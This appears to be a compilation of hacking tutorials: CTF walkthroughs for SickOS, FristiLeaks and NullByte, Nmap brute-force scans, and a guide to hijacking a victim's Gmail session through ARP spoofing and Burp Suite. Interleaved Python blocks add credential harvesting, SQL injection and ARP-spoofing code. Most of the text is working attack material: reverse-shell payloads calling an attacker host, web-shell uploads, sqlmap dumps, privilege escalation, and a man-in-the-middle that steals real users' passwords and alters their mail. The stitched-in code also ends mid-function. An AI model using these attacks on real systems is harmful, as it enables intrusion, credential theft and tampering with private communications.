Hack the SickOS 1.1 VM (CTF Challenge)


Hack the SickOS 1.1 VM (Boot2root)

This time we are going to crack SickOS 1.1, one of the Boot2root challenges. This CTF gives a clear picture of how an attack on a network can be carried out in a safe environment. The objective is to compromise the machine and gain administrative (root) privileges on it.

Breaching Methodology:

·         Network Scanning (Netdiscover, Nmap)
·         Configure the browser proxy
·         Use robots.txt
·         Search for the Wolf CMS admin login page and default credentials (Google)
·         Enter the admin console
·         Generate a PHP backdoor (Msfvenom)
·         Upload and execute the backdoor
·         Reverse connection (Metasploit)
·         Steal the password from config.php
·         Get into the shell for privilege escalation
·         Import a Python one-liner for a proper TTY shell
·         Open /etc/passwd
·         Switch user (su) and submit the stolen password
·         Take root access

We will start off by finding the target.
 netdiscover




Our target IP is 192.168.1.101. Now we scan it with Nmap (all ports, with service and version detection):
nmap -p- -A 192.168.1.101




If you looked closely at the Nmap output, there was a proxy on port 3128 (the default port of the Squid HTTP proxy). So we will set up a manual proxy in the browser: give the IP of the VM as the HTTP proxy and 3128 as the port, so that our requests to the web server go through it.




There is always a chance of finding a robots.txt file in the web root, so while testing any system we should always check for it. Here it pays off: it mentions /wolfcms, which means either the website is built on Wolf CMS or there is a directory with that name.




Then open it in the browser as 192.168.1.101/wolfcms/ (through the proxy), and the page that appears, shown below, confirms that the site is built on Wolf CMS.
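The two steps above (reach the site through the Squid proxy, then mine robots.txt for paths worth visiting) as an added Python example; this is not code from the original write-up. The proxy address, the base URL and the robots.txt text are assumptions and constructed samples; the real fetch is only attempted if the host is reachable, otherwise the script falls back to the sample text.

```python
"""Enumerate robots.txt through a forward proxy (added example, not from the write-up).

Assumptions: the target is reached through an HTTP proxy on port 3128 and the
robots.txt text below is a constructed sample.
"""
import urllib.request
from typing import List
from urllib.parse import urljoin


def fetch_via_proxy(url: str, proxy: str, timeout: float = 10.0) -> str:
    """Fetch url by sending the request to a forward proxy such as Squid.

    proxy is e.g. "http://192.168.1.101:3128" (assumed address).
    """
    opener = urllib.request.build_opener(
        urllib.request.ProxyHandler({"http": proxy, "https": proxy})
    )
    with opener.open(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def disallowed_paths(robots_txt: str) -> List[str]:
    """Unique paths from Disallow: lines, in order of appearance.

    Comments (#) and blank lines are ignored; a bare 'Disallow:' (allow all)
    and catch-all entries such as '/' or '/*' carry no information and are skipped.
    """
    paths = []
    for raw in robots_txt.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line.lower().startswith("disallow:"):
            continue
        value = line.split(":", 1)[1].strip()
        if not value or value in ("/", "/*"):
            continue
        if value not in paths:
            paths.append(value)
    return paths


def candidate_urls(base: str, robots_txt: str) -> List[str]:
    """Turn Disallow entries into absolute URLs to visit manually."""
    return [urljoin(base, p) for p in disallowed_paths(robots_txt)]


# Constructed sample modelled on what a CMS install might publish.
SAMPLE_ROBOTS = """User-agent: *
Disallow: /    # catch-all, tells us nothing
Disallow: /wolfcms
Disallow: /wolfcms   # duplicate entries are common
"""

if __name__ == "__main__":
    base = "http://192.168.1.101/"          # assumed target
    proxy = "http://192.168.1.101:3128"     # assumed Squid proxy
    try:
        text = fetch_via_proxy(urljoin(base, "robots.txt"), proxy)
    except OSError as exc:                  # offline: fall back to the sample
        print(f"fetch failed ({exc}); using constructed sample")
        text = SAMPLE_ROBOTS
    for url in candidate_urls(base, text):
        print(url)
```

The same ProxyHandler is what the browser's manual proxy setting does for you; routing every request through the proxy matters here because the web server is only reachable that way.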




I didn't know much about Wolf CMS, so I searched Google for where its admin page resides. Having found the login page that way, I opened it, and it asked for a username and password. The default credentials are admin and admin, and they worked, so I was logged into the admin console. From there, select the Files tab and then the upload option.




Here we need to upload a malicious file. To generate it, open a terminal in Kali and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw
Meanwhile, run multi/handler inside the Metasploit framework to catch the connection.





Copy the generated code, from the opening <?php tag through die();, paste it into a text file with a .php extension (here shell.php), and upload that file.




As we can see, the PHP backdoor has been uploaded into the /public directory.




Now we need to execute shell.php to get the reverse connection in Metasploit: browse (through the proxy) to 192.168.1.101/wolfcms/public/shell.php.




Meanwhile, return to the Metasploit terminal, where multi/handler is waiting for the meterpreter session:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.108
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

In the image below you can observe Meterpreter session 1. Now let's work toward root. We have access to /var/www/wolfcms, where we found the config.php file; opening it shows the database username and password. Credentials in application config files are frequently reused for system accounts, so this password is worth trying elsewhere.




Next, to get a proper TTY shell, spawn one with a Python one-liner:
python -c 'import pty;pty.spawn("/bin/bash")'
Moving on, read the password file:
cat /etc/passwd
Looking through the accounts it lists, you will see that user sickos has UID and GID 1000:1000, which on Debian-style systems means it is the first regular account created at install time, so it is the most likely place to find a reused password. Switch to sickos with the password john@123 that we found in config.php; since sickos has sudo rights, escalate from there:
su sickos
sudo -s
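How the config.php and /etc/passwd steps above fit together, as an added example that is not part of the original write-up: pull the database credentials out of the PHP config and pick the local accounts worth trying them on. The config.php and /etc/passwd contents below are constructed samples modelled on a Wolf CMS config and a stock Debian passwd file; the DB user name 'root' is assumed, the password is the one the write-up found.

```python
"""Harvest DB credentials from a CMS config and pick local users to try them on.

Added example, not from the original write-up. The config and passwd texts
are constructed samples.
"""
import re
from typing import Dict, List, Tuple

# Matches PHP constants of the form define('NAME', 'value');
DEFINE_RE = re.compile(
    r"""define\(\s*['"](?P<name>\w+)['"]\s*,\s*['"](?P<value>[^'"]*)['"]\s*\)"""
)


def php_defines(config_text: str) -> Dict[str, str]:
    """Collect every define('NAME', 'value') constant in a PHP config file."""
    return {m.group("name"): m.group("value") for m in DEFINE_RE.finditer(config_text)}


def db_credentials(defines: Dict[str, str]) -> List[Tuple[str, str]]:
    """Pair each *_USER constant with its *_PASS or *_PASSWORD constant."""
    pairs = []
    for name, user in defines.items():
        if not name.upper().endswith("USER"):
            continue
        prefix = name[: -len("USER")]
        for suffix in ("PASS", "PASSWORD"):
            pw = defines.get(prefix + suffix)
            if pw is not None:
                pairs.append((user, pw))
                break
    return pairs


def interactive_users(passwd_text: str, min_uid: int = 1000) -> List[str]:
    """Accounts in /etc/passwd with a login shell and UID >= min_uid.

    UID 1000 is the first account created at install time on Debian-style
    systems, so these are the users most likely to reuse an application password.
    """
    users = []
    for line in passwd_text.splitlines():
        parts = line.split(":")
        if len(parts) != 7:
            continue
        name, _, uid, _, _, _, shell = parts
        if uid.isdigit() and int(uid) >= min_uid and not shell.endswith(("nologin", "false")):
            users.append(name)
    return users


def su_attempts(config_text: str, passwd_text: str) -> List[Tuple[str, str]]:
    """(user, password) combinations to try with su: the DB user itself first, then local users."""
    creds = db_credentials(php_defines(config_text))
    attempts = list(creds)
    for user in interactive_users(passwd_text):
        for _, pw in creds:
            if (user, pw) not in attempts:
                attempts.append((user, pw))
    return attempts


# Constructed samples.
SAMPLE_CONFIG = """<?php
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');
define('TABLE_PREFIX', '');
"""
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
"""

if __name__ == "__main__":
    for user, pw in su_attempts(SAMPLE_CONFIG, SAMPLE_PASSWD):
        print(f"su {user}   # password: {pw}")
```

The ordering is deliberate: the database account name is tried first because it is the one the password was issued for, and only then the interactive accounts, each a separate su attempt that shows up in auth.log.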
Furthermore, we need to go into /root to look for the flag, so run the following commands:
cd /root
ls
Here you will find a text file. Let's read it.
HUUURRRRAYYY!!! We have successfully completed this challenge.





Password Cracking using Nmap

In the previous practical I used a basic Nmap scan of the victim's PC and found open ports such as FTP, SSH, Telnet, SNMP and so on. You can check it from here. But once we have found open ports, what else can we do with Nmap scripts to retrieve information about the victim? Read ahead to find out.

FTP BRUTE

Crack the FTP password with Nmap's ftp-brute script (the .nse suffix is optional):

nmap -p21 --script ftp-brute.nse --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105


From the scan result I successfully obtained the victim's FTP credentials: msfadmin:msfadmin as username and password.

TELNET BRUTE

Crack the Telnet password with Nmap's telnet-brute script:

nmap -p23 --script telnet-brute.nse --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105


I successfully obtained the victim's Telnet credentials: msfadmin:msfadmin as username and password.

SMB BRUTE

Crack the SMB password with Nmap's smb-brute script:
nmap -p445 --script smb-brute.nse --script-args userdb=/root/Desktop/user.txt,passdb=/root/Desktop/pass.txt 192.168.1.105


I successfully obtained the victim's SMB credentials: msfadmin:msfadmin and user:user as username and password.

MYSQL BRUTE
Crack the MySQL server password with Nmap's mysql-brute script (only a user list is supplied here, so the script falls back to its default password list):
nmap -sT -p3306 --script mysql-brute.nse --script-args userdb=/root/Desktop/user.txt 192.168.1.105


Here I found two users, root and guest, with empty passwords on the MySQL server.
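Running these scripts by hand is fine for one host; against a list of hosts you want to parse what they print. The following Python is an added example, not from the original article: it builds the Nmap command line without a shell and parses the "Valid credentials" lines the brute scripts emit. The scan output below is a constructed sample in the format Nmap's brute scripts print; the nmap binary, the wordlist paths and the target address are assumptions.

```python
"""Run Nmap's brute scripts and parse the credentials they report (added example).

Not from the original article; the sample output is constructed.
"""
import re
import subprocess
from typing import List, Tuple

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+open\s+(\S+)")
# Scripts built on the brute library print "user:pass - Valid credentials";
# smb-brute prints "user:pass => Valid credentials". Both are handled.
ACCOUNT_RE = re.compile(
    r"^\|_?\s+(?P<user>[^:\s]+):(?P<pw>.*?)\s+(?:-|=>)\s+Valid credentials\s*$"
)


def brute_argv(target: str, port: int, script: str, userdb: str, passdb: str) -> List[str]:
    """argv list (no shell involved) for one of the commands shown in the article."""
    return ["nmap", "-p", str(port), "--script", script,
            "--script-args", f"userdb={userdb},passdb={passdb}", target]


def parse_brute_output(text: str) -> List[Tuple[str, str, str, str]]:
    """Return (port, service, user, password) for every 'Valid credentials' line.

    The 'NNN/tcp open service' line preceding a script block tells us which
    service a hit belongs to; '<empty>' is how Nmap prints a blank password.
    """
    hits = []
    port = service = None
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            port, service = m.group(1), m.group(3)
            continue
        m = ACCOUNT_RE.match(line)
        if m and port is not None:
            pw = m.group("pw")
            hits.append((port, service, m.group("user"), "" if pw == "<empty>" else pw))
    return hits


def run_brute(target: str, port: int, script: str, userdb: str, passdb: str):
    """Execute the scan and parse it (needs nmap installed and a reachable target)."""
    proc = subprocess.run(brute_argv(target, port, script, userdb, passdb),
                          capture_output=True, text=True, check=True)
    return parse_brute_output(proc.stdout)


# Constructed sample of what the three commands in the article print.
SAMPLE_OUTPUT = """Nmap scan report for 192.168.1.105
PORT     STATE SERVICE
21/tcp   open  ftp
| ftp-brute:
|   Accounts:
|     msfadmin:msfadmin - Valid credentials
|_  Statistics: Performed 9 guesses in 2 seconds, average tps: 4.5
445/tcp  open  microsoft-ds
| smb-brute:
|   msfadmin:msfadmin => Valid credentials
|_  user:user => Valid credentials
3306/tcp open  mysql
| mysql-brute:
|   Accounts:
|     root:<empty> - Valid credentials
|     guest:<empty> - Valid credentials
|_  Statistics: Performed 50 guesses in 1 seconds, average tps: 50.0
"""

if __name__ == "__main__":
    for port, service, user, pw in parse_brute_output(SAMPLE_OUTPUT):
        print(f"{service}/{port}: {user}:{pw or '<empty>'}")
```

Passing the arguments as a list keeps wordlist paths and target names from ever being interpreted by a shell; the userdb and passdb files themselves are plain text with one entry per line.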

Hack the Fristileaks VM (CTF Challenge)


Today we will walk through the FristiLeaks VM. Nothing is known about this VM except that its difficulty ranges from beginner to intermediate. Also, the VM only works with the MAC address 08:00:27:A5:A6:76; with any other address it will not work.

Task: Get root Access and Capture the Flag
Level: Intermediate

Penetrating Methodology
·         Scanning Network
·         Enumeration
·         Exploiting Web Application
·         Post Exploit Enumeration
·         Privilege Escalation
·         Capture the Flag

WalkThrough
Scanning Network
Let's start by scanning the victim's IP:
nmap -A 192.168.1.110

Nmap shows us that port number 80 is open. Therefore, let’s open our victim’s IP in the browser.

Enumeration
Exploring the webpage, it occurred to me that Fristi is also a drink, like cola or beer or Sisi, and there was a reference to it on the home page, so there was a possibility that fristi is a directory here too. There was no harm in trying.

And we found the login portal at /fristi. Cheers. When I looked at the page source of this directory, I found what I think is a username.
The page source also contained an image encoded as base64; decoding it (save the encoded text to a file called encode) gives an image with a string of letters in it. To decode, type:
base64 -d encode > 1.png
Exploiting
Then we took the PHP reverse shell that ships with Kali (in /usr/share/webshells/php), set its lhost and lport values to point at our listener, and gave it a .jpg extension so that the upload form accepts it.
We uploaded it at 192.168.1.110/fristi/do_upload.php, started a netcat listener, and then triggered the shell by browsing to:
192.168.1.110/fristi/uploads/shell.php.jpg
The listener, and the first commands we ran in the session it received:
nc -lvp 1234
cd /home
ls
cd eezpeez
ls -la

Post Exploit Enumeration
So, in the /eezpeez directory we found a notes.txt file. Let's read it:
cat notes.txt

notes.txt contains a message from jerry telling us what to do. So let's follow his steps by typing:
echo "/bin/chmod -R 777 /home/admin" > /tmp/runthis
Once that command has been picked up and run, go to the admin directory and list it:
cd /home/admin
ls -la

In the listing above you can see cryptpass.py, a small script that encrypts a string, and a file holding an encrypted string. Save the script to your Kali box, modify it so that it performs the encoding steps in reverse (decoding instead of encoding), and run it on the string:
python cryptpass.py =RFn0AKnlMHMPIzpyuTI0ITG
The decoded string is 'LetThereBeFristi!'
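Inverting the script, as an added Python example (this is not the VM's cryptpass.py itself). It assumes the encoder does what the script on the box does: base64-encode the input, reverse the result, then apply rot13. Undoing that means applying the inverse of each step in the opposite order, which is all the "modify it to decrypt" instruction above amounts to.

```python
"""Invert the cryptpass.py encoder (added example, not the VM's own script).

Assumption: the encoder is base64 -> reverse -> rot13. The ciphertext in
__main__ is the one the write-up decodes.
"""
import base64
import codecs


def encode_string(plain: str) -> str:
    """The encoder as assumed: base64 -> reverse -> rot13."""
    b64 = base64.b64encode(plain.encode()).decode()
    return codecs.encode(b64[::-1], "rot13")


def decode_string(token: str) -> str:
    """The inverse, each step undone in reverse order: rot13 -> reverse -> base64-decode.

    rot13 is its own inverse. A leading '=' in the token is base64 padding
    that the reversal moved to the front, which is why the ciphertext found
    on the box starts with '='.
    """
    b64 = codecs.decode(token, "rot13")[::-1]
    return base64.b64decode(b64).decode()


if __name__ == "__main__":
    import sys
    token = sys.argv[1] if len(sys.argv) > 1 else "=RFn0AKnlMHMPIzpyuTI0ITG"
    print(decode_string(token))
```

Run it with the string from the box as its argument, or with none to use the value above. Note that nothing here is encryption in any real sense: there is no key, so anyone who can read the script can recover every "encrypted" value.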
Privilege Escalation
This may be the password of the fristigod user. Let's try it by switching to that user:
su fristigod
Enter 'LetThereBeFristi!' as the password. Then I explored fristigod's home directory and found its bash history file, in which one command had been run over and over again with sudo:
cd /var/fristigod
ls -lsa
cat .bash_history
So let's check whether we have sudo rights for that command:
sudo -l
It asks for fristigod's password; use the same one as above. The command may be run as user fristi, so run a shell through it:
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash
id
cd /root
ls
cat fristileaks_secrets.txt
Navigating around with the commands above, I found a text file; its contents are the second and last flag.
And VOILA!! That is how you solve another CTF, FristiLeaks. Happy Pentesting!!


Hijacking Gmail Message on Air using Burpsuite

There are various powerful attacks possible with Burp Suite that many may not know of; we will try one of them in this article. We will learn how to get between the victim and Gmail (a man-in-the-middle position on the local network) and change the text of a message before it reaches the receiver.
First of all, go to the terminal of Kali and type:
arpspoof -i wlan0 -t 192.168.100.4 192.168.100.1
Here,
-i --> interface
wlan0 --> the interface on which you share a segment with the victim (use eth0 if you and the victim are on a wired segment)
-t --> target
192.168.100.4 --> victim IP

192.168.100.1 --> gateway (router) IP


Executing the above command tells the victim that the gateway's IP address belongs to our MAC address, so the packets the victim sends to the router come to us instead. Once that is running, open another terminal in Kali and run the reverse of it, which tells the router that the victim's IP belongs to us, so that the packets from the router to the victim also pass through us:
arpspoof -i wlan0 -t 192.168.100.1 192.168.100.4
Here,
-i --> interface
wlan0 --> network interface
-t --> target
192.168.100.1 --> gateway (router) IP
192.168.100.4 --> victim IP


This command captures the packets sent from the router to the victim. Now enable IP forwarding on our PC, so that the traffic we intercept is still passed on and the victim's connection keeps working:
echo 1 > /proc/sys/net/ipv4/ip_forward

Then add a NAT rule so that all traffic arriving for port 80 is redirected to our own IP (192.168.100.5, where Burp will listen):
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.100.5

And the same for port 443:
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.100.5
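What the two arpspoof commands above actually put on the wire, as an added Python example that is not part of the original article: each one repeatedly sends an ARP reply to its target claiming that the other host's IP address is at the attacker's MAC. The block builds and parses such frames, produces the pair that poisons both directions, and includes the check a defender uses to spot them (a reply whose sender IP is bound to a MAC other than the known one). All MAC addresses are made-up values.

```python
"""Build, parse and detect the ARP replies arpspoof sends (added example).

Not part of the original article; MAC addresses below are made up.
"""
import struct
from ipaddress import IPv4Address
from typing import Dict, Tuple

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def mac_bytes(mac: str) -> bytes:
    return bytes.fromhex(mac.replace(":", ""))


def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_arp_reply(attacker_mac: str, spoofed_ip: str, victim_mac: str, victim_ip: str) -> bytes:
    """Ethernet + ARP frame saying 'spoofed_ip is-at attacker_mac', unicast to the victim."""
    eth = mac_bytes(victim_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETHERTYPE_ARP)
    arp = struct.pack("!HHBBH", 1, 0x0800, 6, 4, ARP_REPLY)           # htype, ptype, hlen, plen, oper
    arp += mac_bytes(attacker_mac) + IPv4Address(spoofed_ip).packed   # sender HW/IP: the lie
    arp += mac_bytes(victim_mac) + IPv4Address(victim_ip).packed      # target HW/IP
    return eth + arp


def parse_arp(frame: bytes) -> Dict[str, object]:
    """Decode an Ethernet/ARP frame for IPv4 over Ethernet."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_ARP:
        raise ValueError("not an ARP frame")
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        raise ValueError("unsupported ARP variant")
    body = frame[22:42]
    return {
        "oper": oper,
        "sender_mac": mac_str(body[0:6]),
        "sender_ip": str(IPv4Address(body[6:10])),
        "target_mac": mac_str(body[10:16]),
        "target_ip": str(IPv4Address(body[16:20])),
    }


def poison_pair(attacker_mac: str, victim_mac: str, victim_ip: str,
                gateway_mac: str, gateway_ip: str) -> Tuple[bytes, bytes]:
    """The frames the article's two arpspoof commands send, one per direction."""
    return (
        build_arp_reply(attacker_mac, gateway_ip, victim_mac, victim_ip),   # to victim: gateway is-at attacker
        build_arp_reply(attacker_mac, victim_ip, gateway_mac, gateway_ip),  # to gateway: victim is-at attacker
    )


def is_spoof_reply(frame: bytes, known: Dict[str, str]) -> bool:
    """Detection: an ARP reply whose sender IP is mapped to a MAC other than the one we know."""
    a = parse_arp(frame)
    return a["oper"] == ARP_REPLY and known.get(a["sender_ip"], a["sender_mac"]) != a["sender_mac"]


def send_frame(iface: str, frame: bytes) -> None:
    """Put a frame on the wire (Linux only, needs root or CAP_NET_RAW)."""
    import socket
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        s.send(frame)
```

arpspoof keeps resending these every couple of seconds because the poisoned entries expire and legitimate replies from the real gateway would otherwise restore them; that repetition is also why a tool like arpwatch, which keeps the known IP-to-MAC table used in is_spoof_reply, catches the attack easily.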


After all this is done, open Burp Suite, go to the Proxy tab and then the Options tab. Once there, click the Add button.


Clicking Add makes the following options appear. Give port number 80 in the box next to "Bind to port", and in "Specific address" give your own IP.

Then select the Request handling tab and check "Support invisible proxying" (required because the victim's browser is not configured to use a proxy and sends plain requests). Then click OK.


Repeat the above steps for Port no 443 too.


After clicking OK, make sure the Running and Invisible boxes are checked for both listeners.


When the victim signs in to their Gmail account, we capture the data in Burp Suite. Note that Gmail is served over HTTPS, so the victim's browser will only accept Burp's forged certificate if Burp's CA certificate has been installed in the victim's trust store; otherwise the browser shows a certificate error, and for HSTS-preloaded domains such as Google's mail domains it will not even offer a click-through.


All this captured data contains the victim's username and password, as shown below.

Here is the closer view to the username and password.

The victim types and sends a message without suspicion:

But when the victim clicks the Send button, the mail passes through us before reaching its destination.


Now you can change the text of the message by left-clicking in the message area and typing your own text; I changed HELLO THIS IS TESTING to YOU HAVE BEEN HACKED.


Once you have changed the message, click the Forward button at the top left and the mail goes on to its destination, as shown below:


Hack the NullByte VM (CTF Challenge)


This is our article on the boot2root penetration testing challenge NullByte VM. Breaking into it isn't too difficult: there is no advanced exploitation or reverse engineering. The level is considered beginner-intermediate. We have to find proof.txt and follow the further steps. You can download it from here.
Penetrating Methodology:
Network Scanning (Nmap, netdiscover)
Information Gathering
§  Extracting hidden text from an image (ExifTool)
§  Dictionary attack using rockyou.txt (Burp Suite)
Steal database information via SQL injection (sqlmap)
Login to SSH
Find SUID binaries
Privilege escalation by manipulating $PATH
Get root access and capture the flag

Let's Begin the Game!!!
Start off by finding your target by running netdiscover in the terminal of the attacking machine.




Our target is 192.168.1.142. And now that we know our target, we will scan it using nmap.
nmap -A 192.168.1.142




Scanning the IP, we learn that ports 80, 111, 777 and 44607 are open. Note that the SSH service has been moved from its default port 22 to port 777. This port may come in handy later to gain access.
Now we will open the target IP in the browser.




There is an image and a quote on the page. You will find nothing in the page source or elsewhere. But there might be something hidden in the image, so download it and read its metadata with ExifTool:
exiftool main.gif




There you will find a comment, kzMb5nVYJw. This might be a directory, and there is no harm in opening it in the browser, so let's do that.





Our assumption was right: it opened in the browser. But it asks for a key, and we have no idea what the key is. So we will run a dictionary attack against the form using Burp Suite (Intruder) with rockyou.txt as the wordlist.




Through the dictionary attack you will find the key: elite. Enter it where it is asked for, and a new web page opens that asks for a username. Once again we do not know the username, so we will find it in the database using sqlmap on the search parameter:
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 --dbs --batch




It gives us the name of the database: seth.




Next we dump the tables and columns of that database:
sqlmap -u http://192.168.1.142/kzMb5nVYJw/420search.php?usrtosearch=1 -D seth --dump-all --batch
Once the command completes, it shows the table name along with its columns, including the username and password, as shown:




As a result we have a username and a password, but the password is an MD5 hash, so we need to crack it. There are many online tools for this; go to md5coder.org, paste the MD5 value, click OK and it shows the original word: omega. (Submitting a hash to a third-party website discloses it; on a real engagement crack it offline against a wordlist instead.)
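A model of the two steps sqlmap and the online cracker performed above, as an added Python example that is not the VM's code. It rebuilds the 420search.php?usrtosearch=... endpoint over an in-memory SQLite table with constructed rows, shows the string-concatenated query beside its parameterized fix, dumps the users table through a UNION payload in the same parameter sqlmap attacked, and cracks the resulting MD5 hashes offline against a small constructed wordlist. In SQLite the schema lives in sqlite_master, which stands in for the MySQL information_schema that sqlmap's --dbs and --tables read; the user names, hashes and wordlist are all constructed.

```python
"""SQL injection through a search parameter, its fix, and offline MD5 cracking (added example).

Not the VM's code; rows, hashes and the wordlist are constructed samples.
"""
import hashlib
import sqlite3
from typing import Dict, Iterable, List, Optional, Tuple


def md5_hex(word: str) -> str:
    return hashlib.md5(word.encode()).hexdigest()


def make_db() -> sqlite3.Connection:
    """Constructed users table; the hashes are md5 of words chosen for the demo."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, user TEXT, pass TEXT, position TEXT)")
    con.executemany(
        "INSERT INTO users (user, pass, position) VALUES (?, ?, ?)",
        [("ramses", md5_hex("omega"), "admin"), ("isis", md5_hex("secret42"), "employee")],
    )
    return con


def search_vulnerable(con: sqlite3.Connection, usrtosearch: str) -> List[Tuple]:
    """Input is pasted into the SQL text: a quote ends the string and the rest becomes code."""
    sql = f"SELECT id, user, position FROM users WHERE user LIKE '%{usrtosearch}%'"
    return con.execute(sql).fetchall()


def search_safe(con: sqlite3.Connection, usrtosearch: str) -> List[Tuple]:
    """Parameterized: the value travels separately from the SQL and can never become code."""
    return con.execute(
        "SELECT id, user, position FROM users WHERE user LIKE '%' || ? || '%'",
        (usrtosearch,),
    ).fetchall()


# Payloads for the usrtosearch parameter. The UNION must return the same
# number of columns (3) as the original SELECT; '-- ' comments out the tail.
DUMP_SCHEMA = "' UNION SELECT 0, name, sql FROM sqlite_master-- "
DUMP_USERS = "' UNION SELECT id, user, pass FROM users-- "


def dump_hashes(con: sqlite3.Connection) -> Dict[str, str]:
    """user -> md5 hash, read back through the search result's third column."""
    rows = search_vulnerable(con, DUMP_USERS)
    return {user: third for _, user, third in rows if len(str(third)) == 32}


def crack_md5(digest: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: unsalted MD5 is fast, so hash each candidate and compare."""
    digest = digest.lower()
    for word in wordlist:
        if md5_hex(word) == digest:
            return word
    return None


WORDLIST = ["123456", "password", "alpha", "omega", "letmein"]  # constructed stand-in for rockyou.txt

if __name__ == "__main__":
    db = make_db()
    for user, h in dump_hashes(db).items():
        print(user, h, crack_md5(h, WORDLIST))
    print("parameterized query treats the payload as data:", search_safe(db, DUMP_USERS))
```

The fix is the parameterized query alone; escaping quotes by hand is not a substitute. For real hash lists, feed the same digests to hashcat or John the Ripper with rockyou.txt, which do the loop in crack_md5 on the GPU.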




Now we log in over SSH on the non-standard port:
ssh ramses@192.168.1.142 -p 777
Give omega as the password and you are logged in. Next, enumerate all binaries that have the SUID bit set:
find / -perm -u=s -type f 2>/dev/null
We found that the SUID bit is set on /var/www/backup/procwatch, which is quite attention-grabbing, so we decided to explore it further.




cd /var/www/backup/
./procwatch

When we run it, procwatch appears to execute ps, the genuine process-status binary in /bin. The important point is that the author set the SUID bit on procwatch, and it is probably a small program that calls ps through a system() call by bare name rather than by absolute path.
Taking advantage of this, we can escalate to root and hit the goal of this VM by manipulating the PATH environment variable: if we can get procwatch to run sh instead of ps, it should give us a root shell. This technique is known as Linux privilege escalation via the $PATH variable, and there are several ways to manipulate it.

1st Method

echo "/bin/sh" > ps
chmod 777 ps
echo $PATH
export PATH=.:$PATH
echo $PATH
./procwatch

Having '.' first in $PATH means the shell looks for binaries and scripts in the current directory before anywhere else, so procwatch's call to ps now runs our file, and because procwatch is SUID root the shell it spawns is a root shell. Once the above commands have run, type:
id
cd /root
ls
cat proof.txt




2nd Method

cp /bin/sh /tmp/ps
echo $PATH
export PATH=/tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
./procwatch
Here /tmp, which we can write to, is placed at the front of $PATH, so the copy of sh there is found before the real ps. Once the above commands have run we have a root shell; then type:
id
cd /root
ls
cat proof.txt




3rd Method
vi ps
Once the vi editor opens, type /bin/sh, then save the file.



chmod 777 ps
echo $PATH
export PATH=.:$PATH
cd /var/www/backup
./procwatch
This is the first method again, with the file written in an editor rather than with echo. Once the above commands have run we have a root shell; then type:
id
cd /root
ls
cat proof.txt
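Why all three methods above work, and what the fix looks like, as an added Python example that is not the VM's procwatch binary. It plants a fake ps in a scratch directory (standing in for the article's echo "/bin/sh" > ps) and compares what a bare-name lookup resolves to under the attacker's $PATH (the article's two variants: '.' first, or a writable directory such as /tmp first) with a fixed, trusted $PATH and an absolute path. The trusted PATH value and the /bin/ps location are assumptions.

```python
"""Why a SUID program that calls ps by bare name falls to a $PATH hijack (added example).

Not the VM's procwatch; the fake ps only echoes a marker instead of exec'ing /bin/sh.
"""
import os
import shutil
import stat
import subprocess
import tempfile
from typing import Dict, Optional

TRUSTED_PATH = "/usr/local/bin:/usr/bin:/bin"   # assumed safe search path


def resolve(command: str, path: str) -> Optional[str]:
    """Left-to-right search of PATH, the same lookup sh -c (and so system(3)) performs."""
    return shutil.which(command, path=path)


def plant_fake(dirpath: str, name: str = "ps") -> str:
    """Create an executable named like the trusted command in a directory we control."""
    fake = os.path.join(dirpath, name)
    with open(fake, "w") as f:
        f.write("#!/bin/sh\necho HIJACKED\n")   # a real attack execs /bin/sh here
    os.chmod(fake, os.stat(fake).st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
    return fake


def vulnerable_procwatch(env_path: str) -> str:
    """Models procwatch: runs 'ps' by bare name with whatever PATH the caller supplies."""
    try:
        out = subprocess.run(["ps"], env={"PATH": env_path}, capture_output=True, text=True)
    except OSError as exc:
        return f"exec failed: {exc}"
    return out.stdout


def fixed_procwatch() -> str:
    """The fix: absolute path plus a PATH the caller cannot influence.

    A real setuid program should also drop privileges it does not need.
    """
    try:
        out = subprocess.run(["/bin/ps"], env={"PATH": TRUSTED_PATH}, capture_output=True, text=True)
    except OSError as exc:
        return f"exec failed: {exc}"
    return out.stdout


def demo() -> Dict[str, Optional[str]]:
    """Plant the fake and report what each PATH makes 'ps' resolve to."""
    with tempfile.TemporaryDirectory() as scratch:
        fake = plant_fake(scratch)
        attacker_path = f"{scratch}:{TRUSTED_PATH}"        # 2nd method: writable dir first
        results = {
            "fake": fake,
            "attacker_resolves": resolve("ps", attacker_path),
            "trusted_resolves": resolve("ps", TRUSTED_PATH),
            "output_under_attacker_path": vulnerable_procwatch(attacker_path),
        }
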